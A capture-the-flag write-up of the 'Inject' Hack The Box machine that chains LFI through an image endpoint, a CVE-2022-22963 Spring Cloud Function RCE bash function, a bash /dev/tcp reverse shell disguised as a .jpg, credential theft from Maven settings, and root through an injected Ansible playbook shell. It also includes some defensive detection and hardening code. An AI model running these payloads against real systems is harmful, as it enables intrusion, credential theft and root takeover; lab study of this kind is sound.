💉 Inject Write-Up

This write-up covers the boot-to-root method with very little explanation.

Boot To Root

Enumeration

Let's use RustScan for the initial enumeration:

rustscan -n --ulimit 10000 --scan-order "Random" -a inject.htb -- -A -sC
Output of RustScan
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As we can see, there is not much in terms of open ports, so let's see what's on the other side of the website hosted on the machine.

From here we have only two options: Signup and Upload.

While enumerating Signup, we hit a dead end 😟

Sub-Directory Enumeration

We are going to use feroxbuster for this job. I am using custom bash functions, so don't worry about the commands that I use in the screenshots.

Here is the command that you can actually use to do the sub-directory enumeration; make sure to replace wordlist.txt with the wordlist you want to use:

feroxbuster -s "200,204,301,302,307,308,401,405" -t "600" --timeout 15 -u http://inject.htb -w wordlist.txt -e -x php,html,txt,sql,bak,tar,tar.gz,db,zip,sqlite,ticket,docx,json,aspx,jsp,war --auto-tune

Let's check the upload section.

Try uploading any file and you will get an error stating that only image files can be uploaded. However, just changing the extension of the file allows you to upload any file you want.

You don't have to manipulate the magic number to bypass the verification: just upload any file you want and make sure to give it a .jpg extension.

However, if you want to enumerate the endpoint further, we can use any sample image file and try to work out the path it is being uploaded to.

Let's try that.

After uploading the file you will get a link to view your file; click it and you will be taken to a new page.

Now notice the URL parameter that is being used.

Local File Inclusion

Let's try enumerating for LFI.

We can use ffuf for this

ffuf -w seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://target.local:8080/show_image\?img\=FUZZ -t 100 -c -fc 500,404

As we can see, we have multiple hits.

We can use any one of them; let's try using curl and see what happens:

curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../etc/passwd

We can now read the contents of the /etc/passwd file.
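The traversal works because the img parameter is joined onto the uploads directory without being canonicalised. As an added illustration (not code from the box or from this post), here is a Python sketch of that flawed lookup beside a hardened version that resolves the path and refuses anything outside the uploads directory; the directory path is an assumption for the example.

```python
from pathlib import Path

# Assumed upload directory for the show_image endpoint (constructed for this example)
UPLOAD_DIR = Path("/var/www/WebApp/src/main/uploads")

def vulnerable_resolve(img: str, base: Path = UPLOAD_DIR) -> Path:
    """Mirrors the flawed lookup: the parameter is appended verbatim, so
    every '../' in it walks one level out of the uploads directory."""
    return base / img

def safe_resolve(img: str, base: Path = UPLOAD_DIR) -> Path:
    """Canonicalise the requested path and insist it stays under base."""
    if not img or "\x00" in img:
        raise ValueError("empty or NUL-containing file name")
    root = base.resolve(strict=False)
    candidate = (root / img).resolve(strict=False)   # collapses '..' and follows symlinks
    # An absolute img replaces root in the join, so the containment test catches that too
    if root not in candidate.parents:
        raise ValueError(f"path traversal rejected: {img!r}")
    return candidate

def is_contained(img: str) -> bool:
    """True when the hardened resolver would serve the request."""
    try:
        safe_resolve(img)
        return True
    except ValueError:
        return False
```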

Let's check for files in the web root directory, which by default is /var/www.

Hmmm, looks like we have a Spring Boot project here.

The pom.xml file lists the project's dependencies; let's enumerate that.

We have multiple dependencies here; let's enumerate the first one.

The Spring Cloud Function Web 3.2.2 dependency looks very interesting.

A quick Google search for the exploit leads us to the Spring4Shell exploit, CVE-2022-22963.


Exploit PoC

https://github.com/me2nuk/CVE-2022-22963

Using the knowledge from the PoC at the GitHub link, we can craft our own bash function to make a more interactive exploit:

spring4Shell () {
    # Usage: spring4Shell <base-url> <command>
    # Sends the SpEL routing-expression header that CVE-2022-22963 evaluates server-side
    if [[ -n "$1" && -n "$2" ]]; then
        curl -X POST "$1/functionRouter" \
            -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('$2')" \
            --data-raw 'data' -v
    else
        echo -e "[*] CVE-2022-22963 Spring4Shell"
        echo -e "[*] Simple Remote Code Execution Exploit for Spring Cloud Function"
        echo -e "[!] spring4Shell http://target.com:8080 \"whoami '>' /tmp/pwned\"\n"
    fi
}

You can copy and paste this function into your .bashrc, .zshrc or whatever aliases file you are using and source it, or just start a new terminal session.

source ~/.bashrc
OR
source ~/.zshrc
OR
source ~/.bash_aliases

Once done we can start our exploitation phase.
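From the defender's side, both primitives used so far leave clear traces: a show_image request whose img value walks upward with ../, and a POST to /functionRouter carrying a spring.cloud.function.routing-expression header that references a Java type. As an added example (not part of the original post), the Python below runs those two checks over constructed log lines in an assumed reverse-proxy format that records that header.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the box) in an assumed proxy format that also
# records the SpEL routing header:  <client> "<method> <path>" <status> "<routing-expression>"
SAMPLE_LOG = """\
10.10.14.5 "GET /show_image?img=cat.jpg" 200 "-"
10.10.14.5 "GET /show_image?img=../../../../../../etc/passwd" 200 "-"
10.10.14.5 "GET /show_image?img=..%2F..%2F..%2Fetc%2Fpasswd" 200 "-"
10.10.14.5 "POST /functionRouter" 500 "T(java.lang.Runtime).getRuntime().exec('id')"
10.10.14.9 "POST /functionRouter" 200 "uppercase"
"""

LINE_RE = re.compile(r'^(?P<client>\S+) "(?P<method>\S+) (?P<path>\S+)" (?P<status>\d{3}) "(?P<expr>[^"]*)"$')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")               # ../ or ..\ after decoding
SPEL_TYPE_RE = re.compile(r"T\s*\(\s*java\.", re.I)  # SpEL type reference, the CVE-2022-22963 primitive

def classify(line: str) -> list[str]:
    """Return the detection names that fire for one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    alerts = []
    path = unquote(unquote(m["path"]))   # decode twice so %252F-style double encoding is caught
    if path.startswith("/show_image") and TRAVERSAL_RE.search(path):
        alerts.append("lfi-traversal")
    if m["path"].startswith("/functionRouter") and SPEL_TYPE_RE.search(m["expr"]):
        alerts.append("cve-2022-22963-spel")
    return alerts

def scan(log: str) -> dict[int, list[str]]:
    """Line number -> alerts, for every line that fired."""
    return {n: a for n, line in enumerate(log.splitlines(), 1) if (a := classify(line))}

if __name__ == "__main__":
    for n, alerts in scan(SAMPLE_LOG).items():
        print(n, alerts)
```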


Exploitation

To get a shell we need to upload our reverse shell via the upload method we discovered earlier. However, we don’t know where it is being uploaded, so to get that information we can simply use curl and request a file that does not exist.

curl http://inject.htb:8080/show_image\?img\=../../../../../../../../../../../../../../../../../../../var/www/WebApp/xyx

We have an information disclosure here: the error reveals where the files are being uploaded.

file:/var/www/WebApp/src/main/uploads/../.

Let's craft our own reverse shell:

echo -e '/bin/bash -i >& /dev/tcp/YOUR_HTB_IP/9999 0>&1' > evil.sh.jpg

Upload this to the server via the upload method.

Now start a reverse shell handler in your terminal:

nc -lvkp 9999

Then execute it via the RCE exploit. Before you do that, you might want to check whether you are getting a ping request from the target.

# First, set up tcpdump to listen for the ping request
sudo tcpdump -i tun0 icmp
# Then execute a ping request from the target machine
spring4Shell http://target.local:8080 "ping -c 1 YOUR_HTB_IP"

If all goes well, we can start to execute our reverse shell.

# You can check whether the file is still uploaded via the curl command we used earlier
curl http://target.local:8080/show_image\?img\=../../../../../../var/www/WebApp/src/main/uploads
# If the script got removed from the system, you need to upload it again before exploiting the RCE
# Once ready, start the exploitation
spring4Shell http://target.local:8080 "chmod +x /var/www/WebApp/src/main/uploads/evil.sh.jpg"
spring4Shell http://target.local:8080 "bash -c /var/www/WebApp/src/main/uploads/evil.sh.jpg"

I have two separate windows open: one to execute the RCE and one to catch the reverse shell.

# Upgrade to an interactive tty shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=screen

Privilege Escalation

First things first, try to get a better shell. For example, as you are “frank”, the current user, you can create an authorized_keys file in the /home/frank/.ssh/ folder (create the .ssh folder if it does not exist) and upload your own public key, which you can then use to authenticate via SSH.

Once that’s done, we can check the .m2 folder for the Maven settings file, which contains credentials.

Escalate to the other user, “phil”, using the credentials mentioned in the settings.xml file.

# Switch User to Phil
su phil
# Get the user flag
cd /home/phil
cat user.txt

So how do we escalate from here? Let's use pspy, which you can upload via your own web server.

# On your attacking machine (port 69 is privileged, so run this with sudo or pick a port above 1023)
python3 -m http.server 69 --directory DIRECTORY_WHERE_PSPY_IS_LOCATED/

# Then on the victim machine
wget http://YOUR_HTB_IP:69/pspy
chmod +x pspy
./pspy | tee report.txt

Via pspy we can see that there is a cron job running which executes Ansible playbook files.

If we can inject our own playbook file we can get a root reverse shell.

We can use this template : https://gist.githubusercontent.com/Reelix/32ccf1baaa3066654a460265fca53960/raw/7c61e2ec5c2261d525f4726e5d0511824ac0e15e/reverse-shell.yml

Edit the file and upload it to /opt/automation/tasks/evil.yml.

# evil.yml
# Edit the file as follows, and make sure to provide your own HTB IP (do not copy this comment)
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/YOUR_HTB_IP/6969 0>&1'
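The reason this works is that the cron job runs as root but reads playbooks from a directory a lower-privileged user can write to. As an added example (not from the post or the box), the Python below is the kind of pre-flight check such a cron job should run before calling ansible-playbook: it refuses any playbook that is a symlink, not owned by the trusted uid, or writable by group or others. The demo directory it audits is constructed in a temp dir, so it runs unprivileged; /opt/automation/tasks is taken from the write-up.

```python
import os
import stat
import tempfile
from pathlib import Path

# Directory the root cron job on the box reads playbooks from (from the write-up)
TASKS_DIR = Path("/opt/automation/tasks")
UNTRUSTED_WRITE = stat.S_IWGRP | stat.S_IWOTH

def audit_playbook(path: Path, trusted_uid: int = 0) -> list[str]:
    """Reasons a playbook must NOT be executed by a privileged cron job."""
    st = path.lstat()
    if stat.S_ISLNK(st.st_mode):
        return ["symlink"]          # could point anywhere, including an attacker-controlled file
    problems = []
    if st.st_uid != trusted_uid:
        problems.append(f"owned by uid {st.st_uid}, expected {trusted_uid}")
    if st.st_mode & UNTRUSTED_WRITE:
        problems.append("group/world writable")
    return problems

def audit_directory(tasks_dir: Path = TASKS_DIR, trusted_uid: int = 0) -> dict[str, list[str]]:
    """Map of file name -> problems; an empty map means the cron job may proceed."""
    report = {}
    st = tasks_dir.lstat()
    if st.st_uid != trusted_uid or st.st_mode & UNTRUSTED_WRITE:
        # Anyone who can write here can drop their own evil.yml, whatever the files look like
        report["."] = ["tasks directory not owned by trusted uid or writable by others"]
    for p in sorted(tasks_dir.iterdir()):
        if p.suffix in {".yml", ".yaml"}:
            problems = audit_playbook(p, trusted_uid)
            if problems:
                report[p.name] = problems
    return report

def demo_report() -> dict[str, list[str]]:
    """Build a constructed tasks directory (no real system paths touched) and audit it
    with the current user as the trusted owner, so it runs unprivileged."""
    d = Path(tempfile.mkdtemp())            # mkdtemp gives 0700, owned by us
    (d / "good.yml").write_text("- hosts: localhost\n  tasks: []\n")
    (d / "good.yml").chmod(0o644)
    (d / "evil.yml").write_text("- hosts: localhost\n  tasks: []\n")
    (d / "evil.yml").chmod(0o666)           # the condition that lets a low-priv user swap content
    os.symlink("/nonexistent/target", d / "link.yml")
    return audit_directory(d, os.getuid())

if __name__ == "__main__":
    print(demo_report())
```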

As you can see I got root access after waiting for some time.

Thank you for reading my post, have a great rest of your day, and good hunting 😎
